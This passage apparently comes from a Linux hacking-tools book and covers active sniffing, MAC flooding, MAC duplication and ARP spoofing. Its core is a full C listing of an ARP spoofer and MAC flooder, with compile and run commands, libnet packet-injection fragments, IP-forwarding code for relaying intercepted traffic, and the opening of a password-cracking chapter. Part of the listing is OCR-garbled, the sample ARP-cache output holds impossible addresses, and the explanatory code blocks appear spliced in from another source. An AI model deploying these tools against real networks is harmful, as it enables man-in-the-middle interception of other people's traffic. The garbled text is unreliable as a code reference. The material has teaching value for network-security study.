The following is an example of a command for running the sniffer:

# ./sklsniff_pcap tcp and dst host 192.168.10.1


In this case, the sniffer will only capture TCP packets sent to host 192.168.10.1. 


9.2. Active Sniffers 


To understand the essence of active sniffing, you must know which devices are used in local networks and how they operate. These are the following:

❑ Repeaters and hubs transmit data arriving at one port to all other ports, without any regard for the nature of the data and its destination.
❑ Bridges and switches are selective in the way they handle the data. They inspect the frame headers and send frames from one network segment to another only if the destination address (MAC address) pertains to another network segment.
❑ Routers operate at the third layer of the OSI model; thus, they send data from one subnet to another based on the IP header information.


Therefore, in a network that uses only repeaters and hubs (such networks are called nonswitched networks), a packet sent from a computer reaches all of the network's other computers, but only one computer, the one to which the packet is addressed, accepts it. In a nonswitched network, a passive sniffer operating in promiscuous mode on any of the hosts can intercept packets exchanged among any of the network's other computers.

A switched network uses bridges, switches, and routers. In this type of network, a passive sniffer can only intercept packets in the network segment to which its computer belongs. Active sniffers are used to intercept packets from other segments of a switched network.


9.2.1. Active Sniffing Techniques 


There are many active sniffing techniques. The following are descriptions of some of the most 
popular ones. 


9.2.1.1. MAC Flooding (Switch Jamming) 


This method works on most cheap or obsolete switch models. Switches store the MAC address-to-port mapping table in memory. Flooding this memory with fake MAC addresses cripples the switch's ability to send each frame only to the port of its addressee, and the switch starts sending frames to all of its ports, just like a regular hub or repeater.
9.2.1.2. MAC Duplicating


In a MAC duplicating attack, the perpetrator pretends to have the victim's MAC address. When any frames are sent to the network from the machine with the faked MAC address, switches and bridges add the new route to their address tables, and all data addressed to the victim are routed to the impostor. The victim can also send some data to the network, which causes the switches or bridges to change the route mapping in their tables back to the correct one. Therefore, the impostor has to keep sending frames with the faked MAC address to maintain the fake route in the address tables of the switching devices. Because the data intended for the victim are routed to the impostor, the victim, naturally, does not receive them. This cannot go unnoticed for long; thus, the hacker must immediately resend the intercepted packets to the victim. Also, the hacker can only intercept the data going to the victim, not the data coming from him or her; that is, the interception is one-way only.
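Both attacks exploit the way a switch learns addresses. The following toy model makes the mechanism concrete. It is a hypothetical table with room for only four entries and no entry aging, not the behavior of any particular switch. Once the table is full, frames to an address it never learned are flooded to every port. When a known MAC address shows up on a different port, the entry is simply remapped.

```c
#include <string.h>

#define TABLE_SIZE 4   /* tiny capacity so that the effect is easy to see */
#define FLOOD (-1)     /* "send to all ports", as a hub does */

/* Toy model of a switch's MAC address-to-port table */
struct mac_table {
    unsigned char mac[TABLE_SIZE][6];
    int port[TABLE_SIZE];
    int used;
};

/* Called for every incoming frame with its source MAC and input port */
void table_learn(struct mac_table *t, const unsigned char mac[6], int port)
{
    for (int i = 0; i < t->used; i++) {
        if (memcmp(t->mac[i], mac, 6) == 0) {
            t->port[i] = port;   /* same MAC seen on another port: remap it */
            return;
        }
    }
    if (t->used < TABLE_SIZE) {  /* a full table learns nothing new */
        memcpy(t->mac[t->used], mac, 6);
        t->port[t->used] = port;
        t->used++;
    }
}

/* Returns the output port for a destination MAC, or FLOOD if it is unknown */
int table_lookup(const struct mac_table *t, const unsigned char mac[6])
{
    for (int i = 0; i < t->used; i++)
        if (memcmp(t->mac[i], mac, 6) == 0)
            return t->port[i];
    return FLOOD;
}
```

If four fake addresses arrive on one port before the victim's frames, table_lookup() returns FLOOD for the victim. In a table that already knows the victim on port 1, a frame carrying the victim's address on port 3 moves the entry to port 3.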


9.2.1.3. ARP Redirect (ARP Spoofing) 


This attack belongs to the man-in-the-middle class. It works as follows. Suppose hackers want to intercept traffic between node A and node B in a switched network. When sending data to an IP address, any Ethernet node must also know the corresponding MAC address. Therefore, before sending data, the machine looks up the necessary MAC address in its ARP cache, which stores the IP-to-MAC mapping table. If the needed mapping is not in the cache, the node sends a broadcast ARP request.

Hackers can send a fake ARP message to host A, saying that their machine's MAC address 
corresponds to the IP address of host B. Host A stores this mapping — the victim’s IP address 
to the impostor’s MAC address — in its ARP cache, and thereafter sends data addressed to the 
victim's IP to the impostor’s machine. This, however, covers only one direction: from host A 
to host B. To intercept traffic from host B to host A, the hackers must perform the same procedure with the ARP cache of host B, but this time supply it with a false mapping of host A's IP address to their machine's MAC address. Once this is done, all traffic between host A and host B will pass through the hackers' machine.

The hackers also must periodically send ARP messages to host A and host B to maintain 
the fake cache mappings; otherwise, sooner or later the hosts will build the correct table. 

The hackers must also resend the intercepted packets to their true destinations; otherwise, the missing traffic will soon be noticed. IP forwarding can take care of this task.


9.2.2. Active Sniffing Modules 


An active sniffer consists of three main modules: 


❑ A module to direct the traffic into the home segment of the network (i.e., the segment in which the sniffer is installed) using one of the methods just discussed
❑ A passive sniffer to analyze the intercepted traffic
❑ A module to forward the intercepted traffic to its true destination

How to build a passive sniffer was already considered in previous sections.
The operating system can easily forward traffic to its true destination. The /proc/sys/net/ipv4/ip_forward file controls packet forwarding according to the value stored in it: 0 disables packet forwarding, and 1 enables forwarding of packets to their destination address. The following example shows how to enable packet forwarding:

FILE *fd;

fd = fopen("/proc/sys/net/ipv4/ip_forward", "w");
if (fd == NULL) {
    perror("failed to open /proc/sys/net/ipv4/ip_forward");
    exit(-1);
}
fprintf(fd, "1");
fclose(fd);

This method is used in the well-known Ettercap active sniffer (http://ettercap.sourceforge.net). When the hacker is done using the sniffer, packet forwarding is disabled by writing 0 to the ip_forward file.
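The enable and disable steps can share one small routine. The sketch below is a hypothetical helper, set_forwarding(). It takes the path as a parameter, so that it can be tried on an ordinary file, because only root can write to /proc/sys/net/ipv4/ip_forward. Unlike the fragment above, it also checks the result of fclose(), since a buffered write may fail only when the buffer is flushed.

```c
#include <stdio.h>

/* Hypothetical helper: writes "1" (enable) or "0" (disable) to a
 * forwarding control file such as /proc/sys/net/ipv4/ip_forward.
 * Returns 0 on success, -1 on failure. */
int set_forwarding(const char *path, int enable)
{
    FILE *fp = fopen(path, "w");
    int ok;

    if (fp == NULL) {
        perror(path);
        return -1;
    }
    ok = fputs(enable ? "1\n" : "0\n", fp) != EOF;
    if (fclose(fp) != 0)   /* the data are actually written here */
        ok = 0;
    return ok ? 0 : -1;
}
```

A sniffer would call set_forwarding("/proc/sys/net/ipv4/ip_forward", 1) at startup and make the same call with 0 when it finishes.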

Thus, the remaining task is to consider how to implement the module that directs the traffic into the home segment of the network. Combining all three modules into an active sniffer is a task you can easily handle on your own, should you so desire. I don't consider this aspect in the book.


9.2.3. An ARP Spoofer Not Using the libnet Library 


This section considers a sniffer that uses all three active sniffing methods described in the pre- 
vious section. The source code for the program, named sklsniff_arp.c, is shown in Listing 9.4. 
It can also be found in the /PART II/Chapter 9 directory on the accompanying CD-ROM. 

The program defines a structure named arp_packet, which includes both the Ethernet and the ARP headers. This makes it more convenient to send packets. Packets are sent using a packet socket. According to man 7 packet, the sockaddr_ll structure must be used. The same man page states that to send a packet, it suffices to fill the following fields of this structure: sll_family, sll_addr, sll_halen, and sll_ifindex. In the example program, everything works perfectly with only two fields filled: sll_family and sll_ifindex. You may, however, fill all the fields to make sure that the program works in all situations. MAC addresses are entered in the command line in the human-readable format, as colon- or dash-delimited hexadecimal numbers. In the arp_packet structure, however, MAC addresses must be stored in the network format. That is, if a user enters a MAC address as, for example, 10:20:30:40:50:60, it must be stored in the h_source and ar_sha fields of the arp_packet structure as the six bytes 0x10, 0x20, 0x30, 0x40, 0x50, and 0x60.
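The program sends sizeof(pkt) bytes straight from the arp_packet structure, so the structure must contain no padding. It should consist of a 14-byte Ethernet header followed by a 28-byte ARP header, 42 bytes in all. On common Linux ABIs, every 2-byte field already falls on an even offset, so the compiler inserts no padding. A compile-time check, sketched below with C11 _Static_assert, documents that assumption. The expected offsets are derived from the field sizes and are not taken from the book.

```c
#include <stddef.h>
#include <net/ethernet.h>   /* ETH_ALEN */

/* The arp_packet structure from Listing 9.4 */
struct arp_packet {
    unsigned char h_dest[ETH_ALEN];
    unsigned char h_source[ETH_ALEN];
    unsigned short h_proto;
    unsigned short ar_hrd;
    unsigned short ar_pro;
    unsigned char ar_hln;
    unsigned char ar_pln;
    unsigned short ar_op;
    unsigned char ar_sha[ETH_ALEN];
    unsigned char ar_sip[4];
    unsigned char ar_tha[ETH_ALEN];
    unsigned char ar_tip[4];
};

/* Compilation stops here if the compiler ever pads the structure */
_Static_assert(sizeof(struct arp_packet) == 42, "arp_packet must be 42 bytes");
_Static_assert(offsetof(struct arp_packet, ar_hrd) == 14, "ARP header must start at byte 14");
_Static_assert(offsetof(struct arp_packet, ar_sip) == 28, "sender IP must be at byte 28");
_Static_assert(offsetof(struct arp_packet, ar_tip) == 38, "target IP must be at byte 38");
```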

Unfortunately, there is no standard function for converting MAC addresses to the network format. Therefore, a custom function, get_mac(), removes the colons (or dashes) from the MAC address passed to it and converts each number into a byte.
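glibc does provide ether_aton() in <netinet/ether.h>, but it accepts only the colon-separated form. A stricter variant of get_mac() might look like the following sketch. The name parse_mac() is hypothetical. Unlike get_mac(), it does not modify its input with strtok(), and it rejects strings that do not contain exactly six colon- or dash-separated hexadecimal numbers.

```c
#include <stdio.h>

/* Hypothetical helper: converts "10:20:30:40:50:60" or "10-20-30-40-50-60"
 * into six raw bytes. Returns 0 on success, -1 if the string is malformed. */
int parse_mac(const char *text, unsigned char mac[6])
{
    unsigned int b[6];
    char sep[5];   /* the five separators */
    char tail;     /* matched only if there is trailing garbage */
    int n = sscanf(text, "%2x%c%2x%c%2x%c%2x%c%2x%c%2x%c",
                   &b[0], &sep[0], &b[1], &sep[1], &b[2], &sep[2],
                   &b[3], &sep[3], &b[4], &sep[4], &b[5], &tail);

    if (n != 11)   /* 6 numbers + 5 separators, and nothing after them */
        return -1;
    for (int i = 0; i < 5; i++)
        if (sep[i] != ':' && sep[i] != '-')
            return -1;
    for (int i = 0; i < 6; i++)
        mac[i] = (unsigned char)b[i];
    return 0;
}
```

With this helper, the command-line argument would be checked once, for example with if (parse_mac(argv[4], pkt.h_dest) < 0) followed by an error message, instead of being silently accepted.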

For the sklsniff_arp program, the period at which packets are sent can be set as needed. Packets are sent in an endless loop, and the sleep(period) function pauses between them. The default period is 10 seconds (period = 10).

The remaining aspects of the sniffer’s operation ought to be clear from the source code of 
the program. 
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Listing 9.4. The ARP spoofer (skisniff_arp.c) 





#include 
#include 
finclude 
f#include 
#include 


#if  GLIBC_ 


#include 
#include 
felse 
#include 
#include 
#include 
#endif 
#include 
#include 
#include 
#include 


<stdio.h> 
<stdlib.h> 
<string.h> 
<sy5s/socket .h> 
<features.h> 

_ 2s 2 Ge 
<netpacket/packet. h> 
<net /ethernet .h> 


<asm/types .h> 
<Linux/if_packet.h> 
<linux/if_ether.h> 


<linux/if .h> 
<arpa/inet.h> 
<netdb.h> 

<sys/ioctl.h> 


#define DEVICE "etho" 


struct arp packet 


{ 


unsigned char h_dest [ETH_ALEN]; 


unsigned char h_source[ETH_ALEN]; 


unsigned short h proto; 
unsigned short ar hrd; 
unsigned short ar_ pro; 
unsigned char ar_hln; 

unsigned char ar pln; 

unsigned short ar_op; 

unsigned char ar sha[ETH ALEN]; 
unsigned char ar sip[4]; 
unsigned char ar_tha[ETH_ALEN]; 
unsigned char ar tip[4]; 


/* For the glibc version number */ 
GLIBC MINOR >= 1 


f* 


{ft 





L2 protocols */ 


L2 protecols */ 


Destination ETH address 
Source ETH address 
Packet type ID field 


Format of hardware address 
Format of protocol address 
Length of hardware address 
Length of protocol address 


ARP opcode (command) 
Sender hardware address 
Sender IP address 
Target hardware address 


' Target IP address 


jf*- sag ig ne rg Pa rn Ee a ee Pe ae ae * f 
{* Ganverniny the MAC address to the network format */ 
/* ES Pa Lt en fa a tN a Be « / 
yoid sak aaa eNaHE char* mac, char®* optarg) 
{ 

int i = 0; 

char*® ptr = strtok(optarg, "i-"); 

while(ptr) { 


unsigned nmb; 


sscanf(ptr, "%x", 


&mumb) ; 


mac{i] = (unsigned char)nmb; 
ptr = strtek(NULL, ":-"}; 


i++; 


ry 
mS 
af 
ay 
it 
*/ 
a 
ef 
ff 
ah 
ay 
= 
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i 


fter--- aa ccc recta ek pean pec all ct Goes aes ak cls Rn I el cea am Se laleaaieiemememalt it 
/* Converting the host namé into its IP address */ 
Fi PROC LICE Fetes a Rend Ca ee EE * 


void get_ip(struct in_addr* aude chars str) 
{ 


struct hostent *hp; 


if( (hp = gethostbyname(str)) == NULL) { 
herror ("gethostbyname() failed"); 
exit(-1); 

} 


beopy (hp->h_ addr, in_addr, hp->h_length); 


/*-------------------------------------------------*/
/* The main() function                             */
/*-------------------------------------------------*/

int main(int argc, char *argv[])
{
    struct sockaddr_ll s_ll;
    struct in_addr src_in_addr, targ_in_addr;
    struct arp_packet pkt;
    int sd;
    struct ifreq ifreq;
    char s_ip_addr[16];
    char s_eth_addr[19];
    int period = 2;

    fprintf(stderr, "=============================================\n");
    fprintf(stderr, "= ARP spoofer by Ivan Sklyaroff, 2006       =\n");
    fprintf(stderr, "=============================================\n");

    if (argc < 5) {
        fprintf(stderr,
            "usage: %s <(source ip)||(random)> <(source mac)||(random)> <destination ip> "
            "<destination mac> [period(default 2 sec.)]\n",
            argv[0]);
        exit(-1);
    }

    if (argc == 6)
        period = atoi(argv[5]);

    if ((sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ARP))) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    /* Filling the fields of the sockaddr_ll structure */
    memset(&s_ll, 0, sizeof(struct sockaddr_ll));
    s_ll.sll_family = AF_PACKET;

    /* Looking up the index of the network interface */
    strncpy(ifreq.ifr_ifrn.ifrn_name, DEVICE, IFNAMSIZ);
    if (ioctl(sd, SIOCGIFINDEX, &ifreq) < 0) {
        perror("ioctl() failed");
        exit(-1);
    }

    s_ll.sll_ifindex = ifreq.ifr_ifru.ifru_ivalue;

    /* Filling the fields of the ARP packet */
    pkt.h_proto = htons(0x0806);   /* EtherType: ARP */
    pkt.ar_hrd = htons(1);         /* Hardware type: Ethernet */
    pkt.ar_pro = htons(0x800);     /* Protocol type: IPv4 */
    pkt.ar_hln = 6;                /* MAC address length */
    pkt.ar_pln = 4;                /* IPv4 address length */
    pkt.ar_op = htons(1);          /* Operation: ARP request */

    get_mac(pkt.h_dest, argv[4]);
    memcpy(pkt.ar_tha, &pkt.h_dest, 6);
    get_ip(&targ_in_addr, argv[3]);

    /* Seeding the random number generator once, before the loop */
    srandom(time(NULL));

    /* Sending packets in an endless loop */
    while (1) {
        if (!strcmp(argv[1], "random")) {
            sprintf(s_ip_addr, "%ld.%ld.%ld.%ld", random() % 255, random() % 255,
                    random() % 255, random() % 255);
            get_ip(&src_in_addr, s_ip_addr);
        }
        else
            get_ip(&src_in_addr, argv[1]);

        if (!strcmp(argv[2], "random")) {
            sprintf(s_eth_addr, "%lx:%lx:%lx:%lx:%lx:%lx", random() % 255, random() % 255,
                    random() % 255, random() % 255, random() % 255, random() % 255);
            get_mac(pkt.ar_sha, s_eth_addr);
            memcpy(pkt.h_source, &pkt.ar_sha, 6);
        }
        else {
            get_mac(pkt.ar_sha, argv[2]);
            memcpy(pkt.h_source, &pkt.ar_sha, 6);
        }

        memcpy(pkt.ar_sip, &src_in_addr, 4);
        memcpy(pkt.ar_tip, &targ_in_addr, 4);

        if (sendto(sd, &pkt, sizeof(pkt), 0, (struct sockaddr *)&s_ll,
                   sizeof(struct sockaddr_ll)) < 0) {
            perror("sendto() failed");
            exit(-1);
        }

        sleep(period);
    }

    return 0;
}
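The listing relies on struct arp_packet, which is defined earlier in the program. As a sketch of the on-the-wire layout that the assignments above fill in, the following structure assumes a 14-byte Ethernet header followed by the 28-byte ARP payload for IPv4 over Ethernet. The name arp_packet_sketch is hypothetical, and the book's own definition may differ in detail.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layout: Ethernet II header followed by an IPv4-over-Ethernet
   ARP payload. Field names follow the ones the listing assigns. */
struct arp_packet_sketch {
    uint8_t  h_dest[6];    /* Destination MAC (Ethernet header)   */
    uint8_t  h_source[6];  /* Source MAC (Ethernet header)        */
    uint16_t h_proto;      /* EtherType: 0x0806 for ARP           */
    uint16_t ar_hrd;       /* Hardware type: 1 for Ethernet       */
    uint16_t ar_pro;       /* Protocol type: 0x0800 for IPv4      */
    uint8_t  ar_hln;       /* Hardware address length: 6          */
    uint8_t  ar_pln;       /* Protocol address length: 4          */
    uint16_t ar_op;        /* Operation: 1 = request, 2 = reply   */
    uint8_t  ar_sha[6];    /* Sender hardware (MAC) address       */
    uint8_t  ar_sip[4];    /* Sender IPv4 address                 */
    uint8_t  ar_tha[6];    /* Target hardware (MAC) address       */
    uint8_t  ar_tip[4];    /* Target IPv4 address                 */
};

/* Every 16-bit field falls on an even offset, so common ABIs insert no
   padding: 14 bytes of Ethernet header + 28 bytes of ARP = 42 bytes. */
_Static_assert(sizeof(struct arp_packet_sketch) == 42, "unexpected padding");
_Static_assert(offsetof(struct arp_packet_sketch, ar_op) == 20, "bad ar_op offset");
```

Because the multi-byte fields are stored in network byte order, the listing wraps them in htons() before sending the whole structure with sendto().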





The program is compiled as usual: 

# gcc sklsniff_arp.c -o sklsniff_arp 

The following command sends ARP requests with random source IP and MAC addresses to host 192.168.10.1 (00:50:56:C0:00:01) every second:

# ./sklsniff_arp random random 192.168.10.1 00:50:56:C0:00:01 1

In this way, a MAC flooding attack can be carried out. 

The ARP cache of the 192.168.10.1 host can then be examined. Its contents will look similar to the following:

> arp -a

  Internet Address      Physical Address      Type
  0.238.243.90          d5-ce-d7-a1-e0-5d     dynamic
  §8.8.159.78           1a-f0-8b-62-9f-66     dynamic
  9.114.177.209         a4-6a-0a-42-e1-a5     dynamic
  Pet. 4.145            ae-52-52-29-08-cb     dynamic
  16.74.69.183          aa-d4-83-7b-5e-75     dynamic
  17.101.240.35         b3-38-89-5d-00-0d     dynamic
  295.200.136.254       13-e5-B8f-76-8e-74    dynamic
  33.167.134.206        01-e6-6f-94-f1-c0     dynamic
  37.80.252.251         a9-79-2b-be-97-d4     dynamic


By passing different values to the program, it can be used to carry out both ARP spoofing and MAC flooding attacks.


9.2.4. An ARP Spoofer Using the libnet Library 


This section considers writing a program that has the same functionality as the one considered 
in the previous section (Listing 9.4) but uses the libnet library. 

The libnet library was developed by Mike Schiffman; its latest version can be downloaded 
from http://www.packetfactory.net/libnet/. Like the libpcap library, the libnet library is usu- 
ally included in all modern Linux installation distributions. 

The sequence of steps that the program must perform to form and send a packet using the libnet library is the following:

1. Initialize a libnet session.
2. Form a packet.
3. Send the packet.
4. Close the session.




Before considering these steps in detail, it is necessary to introduce two important concepts used by the libnet library: the libnet context and protocol tags.

The libnet context is an opaque control structure created in memory by the libnet library that maintains the session state for building a complete network packet. The context has the libnet_t type and is used in all main functions of the library. Because the context is an internal structure of the libnet library, an application programmer has no need to know its internals.

As you already know, a complete network packet is constructed starting from the topmost layer and proceeding down the protocol stack. In the process, each layer adds its own header to the packet (see Section 3.3). The libnet library uses tags to reference a specific layer header in a network packet. All libnet functions that construct network packet headers return protocol tags of the libnet_ptag_t type. A constructed packet can later be modified (e.g., a port number changed) by using its protocol tags.
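To make the top-down order concrete without depending on libnet, here is a small sketch that writes the application data first and then prepends an 8-byte UDP header in front of it, in network byte order. The helpers build_udp_top_down() and put16() are hypothetical and are not part of the libnet API; libnet manages its own buffers inside the context instead of using a caller-supplied one.

```c
#include <stdint.h>
#include <string.h>

#define UDP_HDR_LEN 8  /* Same value as libnet's LIBNET_UDP_H */

/* Store a 16-bit value in network (big-endian) byte order */
static void put16(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v >> 8);
    p[1] = (uint8_t)(v & 0xFF);
}

/* Hypothetical helper: copy the payload to the END of buf first (topmost
   layer), then prepend the UDP header in front of it. Returns the packet
   length (header + data), or 0 if it does not fit. The packet starts at
   buf + cap - returned length. */
static size_t build_udp_top_down(uint8_t *buf, size_t cap,
                                 uint16_t sport, uint16_t dport,
                                 const uint8_t *data, size_t len)
{
    if (len > 0xFFFF - UDP_HDR_LEN || cap < UDP_HDR_LEN + len)
        return 0;

    uint8_t *payload = buf + cap - len;       /* Application data first */
    memcpy(payload, data, len);

    uint8_t *udp = payload - UDP_HDR_LEN;     /* Then the UDP header    */
    put16(udp + 0, sport);                    /* Source port            */
    put16(udp + 2, dport);                    /* Destination port       */
    put16(udp + 4, (uint16_t)(UDP_HDR_LEN + len)); /* Header + data length */
    put16(udp + 6, 0);                        /* 0 = no checksum (IPv4) */
    return UDP_HDR_LEN + len;
}
```

An IP header would be prepended in front of the UDP header in the same way, which is why the length fields of lower layers always include the sizes of everything above them.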


9.2.4.1. Initializing a libnet Session 


A libnet session is initialized using the libnet_init() function. Its prototype is the following:
libnet_t *libnet_init(int injection_type, char *device, char *err_buf)


The first parameter can take one of the following values:

LIBNET_LINK: defines a data link layer interface
LIBNET_LINK_ADV: defines an advanced mode data link layer interface
LIBNET_RAW4: defines an IPv4 raw socket
LIBNET_RAW4_ADV: defines an advanced mode IPv4 raw socket
LIBNET_RAW6: defines an IPv6 raw socket
LIBNET_RAW6_ADV: defines an advanced mode IPv6 raw socket


The second parameter is the name of a network interface (e.g., eth0) or the interface’s IP address. It can be specified as NULL, in which case libnet determines the appropriate interface itself.

The third parameter is a pointer to a buffer into which the function writes an error description if it fails.

The function returns a pointer to the libnet_t context. 

The following is a sample code fragment: 


#include <libnet.h>

libnet_t *lc;
char errbuf[LIBNET_ERRBUF_SIZE];

lc = libnet_init(LIBNET_LINK, NULL, errbuf);

if (lc == NULL) {
    fprintf(stderr, "Error opening context: %s", errbuf);
    exit(-1);
}
9.2.4.2. Constructing a Packet


After you have created the libnet context, you can start constructing a network packet. Packet headers are constructed proceeding from the topmost layer toward the lowest layer. Two types of functions can be used for this purpose: libnet_build_*() and libnet_autobuild_*(). Functions of the first type require the programmer to fill all (or almost all) header fields. When functions of the second type are used, only the main fields must be filled; the rest are taken care of by the libnet library automatically.

The libnet library offers functions of the first type for practically all known protocols, whereas functions of the second type are available for only a few of them. For example, an Ethernet header can be built using either type of function (libnet_build_ethernet() or libnet_autobuild_ethernet()), but only a function of the first type is available for a TCP header (libnet_build_tcp()). At least, this is how things were in version 1.1.1 of libnet.

Which headers have to be constructed depends largely on the injection type specified in the libnet_init() function in the first step. For the LIBNET_LINK or the LIBNET_LINK_ADV injection type, a data link layer header must be created in addition to the headers for the higher layers.

For any of the LIBNET_RAW* types, no data link layer header needs to be created; the libnet library creates it automatically. Headers can be created for the layers from the topmost one down to and including the internetwork layer.

The following is an example that constructs a UDP packet: 

#include <libnet.h>

...

libnet_t *lc;                     /* Pointer to the context */
libnet_ptag_t ip4, udp;           /* Protocol tags */
char errbuf[LIBNET_ERRBUF_SIZE];

unsigned short dport = 777;       /* Destination port */
unsigned long dst_ip;             /* Destination IP address */
char *payload = "Hello, World!";  /* Data for sending */
int payload_s;

dst_ip = inet_addr(argv[1]);      /* IP address is passed via the command line */
payload_s = strlen(payload);      /* Length of the data */

/* Initializing a session */
lc = libnet_init(LIBNET_RAW4, NULL, errbuf);
if (lc == NULL) {
    fprintf(stderr, "Error opening context: %s", errbuf);
    exit(-1);
}

/* Constructing a UDP header */
udp = libnet_build_udp(
    1000,                         /* Source port */
    dport,                        /* Destination port */
    LIBNET_UDP_H + payload_s,     /* Total length of header and data */
    0,                            /* Checksum is filled by libnet */
    (u_int8_t *)payload,          /* Pointer to the sent data */
    payload_s,                    /* Length of the data */
    lc,                           /* Pointer to the context */
    0);                           /* Constructing a new header, thus 0 */
if (udp == -1) {
    fprintf(stderr, "Can't build UDP header (port %d): %s\n",
            dport, libnet_geterror(lc));
    exit(-1);
}

/* Constructing an IP header */
ip4 = libnet_autobuild_ipv4(
    LIBNET_UDP_H + LIBNET_IPV4_H + payload_s,  /* Packet length */
    IPPROTO_UDP,                  /* Protocol */
    dst_ip,                       /* Destination IP address */
    lc);                          /* Pointer to the context */
if (ip4 == -1) {
    fprintf(stderr, "Can't build IP header: %s\n",
            libnet_geterror(lc));
    exit(-1);
}
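Passing 0 as the UDP checksum lets libnet compute the value itself. Both the IPv4 header checksum and the UDP checksum are based on the one's-complement Internet checksum described in RFC 1071 (for UDP, a pseudo-header containing the IP addresses is also summed). The following sketch computes that checksum over a buffer whose checksum field is zero; it is an illustration of the algorithm, not libnet's own code, and the name inet_checksum() is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Internet checksum (RFC 1071): one's-complement sum of big-endian 16-bit
   words, with carries folded back in, then complemented. */
static uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;

    while (len > 1) {                         /* Add 16-bit words */
        sum += (uint32_t)((data[0] << 8) | data[1]);
        data += 2;
        len -= 2;
    }
    if (len == 1)                             /* Pad an odd trailing byte */
        sum += (uint32_t)(data[0] << 8);

    while (sum >> 16)                         /* Fold carries into 16 bits */
        sum = (sum & 0xFFFF) + (sum >> 16);

    return (uint16_t)~sum;
}
```

A convenient property for checking a received header: summing it with the checksum field already filled in yields 0.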


You can find the prototypes of the libnet_build_udp() and libnet_autobuild_ipv4() functions in the corresponding man pages or in the header files in the /usr/include/libnet directory. They can also be found in the HTML documentation that usually comes in the same archive with libnet.


9.2.4.3. Sending a Packet 


When all headers of a packet are assembled (from the topmost to the lowest protocol layer), 
the packet can be sent to the network. 

This is accomplished using the libnet_write() function, which has the following 
prototype: 

int libnet_write(libnet_t *l)


The function's only argument is a pointer to the libnet context. In case of an error, the 
function returns -1. 

To send more than one packet, the libnet_write() function can be called in a loop.

The following is an example of using the function: 


if (libnet_write(lc) == -1) {
    fprintf(stderr, "Unable to send packet: %s\n", libnet_geterror(lc));
    exit(1);
}


9.2.4.4. Closing the Session 


As soon as the constructed packet (or packets) is sent to the network, the session must be closed and all internal memory structures associated with the libnet context must be released. This is done using the libnet_destroy() function:

libnet_destroy(lc);
return 0;

The function has the following prototype:

void libnet_destroy(libnet_t *l)

It doesn’t return any value (void). 

The source code for the active sniffer program using the libnet library, named sklsniff_lnet.c, can be found in the /PART II/Chapter 9 directory on the accompanying CD-ROM.

You may notice that MAC addresses in this program are converted to the network format using the libnet_hex_aton() function from the libnet library, whereas the program in Listing 9.2 uses a custom function for this purpose.
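For comparison, a conversion of this kind can be written in a few lines of standard C. The sketch below is a hypothetical parse_mac() helper; it is neither libnet_hex_aton() nor the book's custom function. It accepts only the colon-separated form used on the command line in this chapter (e.g., 00:50:56:C0:00:01) and rejects anything else.

```c
#include <stdio.h>
#include <stdint.h>

/* Hypothetical helper: convert "00:50:56:C0:00:01" into 6 raw bytes.
   Returns 0 on success, -1 if the string is not exactly six hex octets. */
static int parse_mac(const char *s, uint8_t mac[6])
{
    unsigned int b[6];
    char extra;

    /* The trailing %c catches junk after the sixth octet */
    if (sscanf(s, "%x:%x:%x:%x:%x:%x%c",
               &b[0], &b[1], &b[2], &b[3], &b[4], &b[5], &extra) != 6)
        return -1;

    for (int i = 0; i < 6; i++) {
        if (b[i] > 0xFF)
            return -1;                        /* Octet out of range */
        mac[i] = (uint8_t)b[i];
    }
    return 0;
}
```

The resulting bytes are already in the order they appear on the wire, so they can be copied directly into fields such as h_dest or ar_sha.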

To compile the program using the libnet library, execute the following command:

# gcc sklsniff_lnet.c -o sklsniff_lnet `libnet-config --defines` `libnet-config --libs` `libnet-config --cflags`

I recommend creating a makefile to make the compilation process more convenient.
Trying different password combinations is one of the methods used by crackers to obtain unauthorized access to protected resources. Because trying many password combinations by entering them manually is a labor-intensive task, it is delegated to special password-cracking programs. There are two methods used to try different password combinations: the dictionary method and the brute-force method.

In the dictionary method, the attacker uses a program to try all words from a previously prepared dictionary, which contains common words most likely to be used as passwords. This method has a high success rate, but it does not work in all situations. For example, a password like A278NrrkZ cannot be cracked using the dictionary method; only going through all possible character combinations, that is, using the brute-force method, can help here.

The advantage of the brute-force method is that the password will be cracked eventually. Its downside is that the more complex the password (that is, the longer it is and the greater its mix of lowercase and uppercase letters, digits, and special characters), the more time it takes to crack. Therefore, passwords created by security paranoiacs may never be cracked in practice.
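The growth described above is easy to quantify. With an alphabet of k characters there are k^n passwords of length n, so trying every password up to length n takes k + k^2 + ... + k^n attempts. The sketch below computes that total; the function name keyspace() is illustrative. With the 95 printable ASCII characters (space through tilde), each extra character multiplies the work by 95.

```c
#include <stdint.h>

/* Number of candidate passwords of length 1..max_len over an alphabet of
   `alphabet` characters: alphabet^1 + ... + alphabet^max_len.
   Returns UINT64_MAX if the total does not fit in 64 bits. */
static uint64_t keyspace(uint64_t alphabet, unsigned max_len)
{
    uint64_t total = 0, power = 1;

    for (unsigned len = 1; len <= max_len; len++) {
        if (alphabet != 0 && power > UINT64_MAX / alphabet)
            return UINT64_MAX;                /* alphabet^len overflows */
        power *= alphabet;                    /* alphabet^len           */
        if (total > UINT64_MAX - power)
            return UINT64_MAX;                /* Running sum overflows  */
        total += power;
    }
    return total;
}
```

For example, keyspace(10, 4) counts all 1- to 4-digit PINs: 10 + 100 + 1000 + 10000 = 11110.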

There is no strict distinction between the dictionary and the brute-force methods. They 
are similar in that the cracker goes through a list of potential passwords one by one and differ- 
ent in that the list may be explicitly enumerated (the dictionary method), implicitly defined 
(the brute-force method), or a combination of the two. Thus, the “brute force” label is often 
used to denote both methods. I will use the term password cracking as an umbrella for these 
two methods of password guessing, differentiating between the two as necessary. 
The process of cracking passwords can be carried out on a local or a remote machine. Local methods are usually applied to recover passwords from their encrypted forms, also called hashes, taken from a password database that the hacker obtained from a compromised system. The Linux /etc/shadow file is an example of such a password database. As you will recall, nowadays passwords are saved in plain text only in the most primitive systems; in most cases, they are encrypted. In UNIX systems, passwords are encrypted using one-way hash functions, usually through the crypt() function; DES, MD5, and Blowfish are among the most popular algorithms.


10.1. Local Password Crackers 


I consider first a local password-cracking utility that uses the dictionary method and then 
a utility that tries all possible character combinations. 


10.1.1. Using the Dictionary Method 


